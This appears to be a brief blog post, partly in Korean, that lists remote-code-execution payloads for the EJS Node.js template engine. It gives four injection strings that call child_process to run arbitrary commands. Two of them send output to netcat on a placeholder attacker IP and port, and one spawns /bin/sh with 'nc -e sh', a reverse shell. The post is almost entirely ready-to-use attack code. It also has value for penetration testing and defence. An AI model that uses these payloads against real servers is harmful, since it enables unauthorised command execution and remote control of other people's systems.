ejs RCE Payload

Posted Nov 28, 2023

1 min read

ejs에서 사용 가능한 RCE payload 입니다.

Payload

mainModule

  
"process.mainModule.constructor._load('child_process').exec('{CMD}+|+nc+{attackerip}+{port})"

mainModule

  
"process.mainModule.require('child_process').execSync('{CMD}')"

binding

  
"process.binding('spawn_sync').spawn({file:+'/bin/sh',args:+['/bin/sh','-c','nc+{IP}+{PORT}+-e+sh'],stdio:+[{type:+'pipe',readable:+1}]})"

import

  
async function loadModule() {try {const module = await import('child_process');console.log(module.execSync(`{CMD}`).toString());} catch (error) {console.error(error);}};loadModule();

Reference

https://mihee0703.tistory.com/118
https://github.com/aadityapurani/NodeJS-Red-Team-Cheat-Sheet

WEB

ejs RCE Payload

Contents

A new version of content is available.

ejs RCE Payload

Payload

Reference

Further Reading

Response Status Code(307, 308) with POST DATA

Prototype Pollution

AWS Instance Meta-data SSRF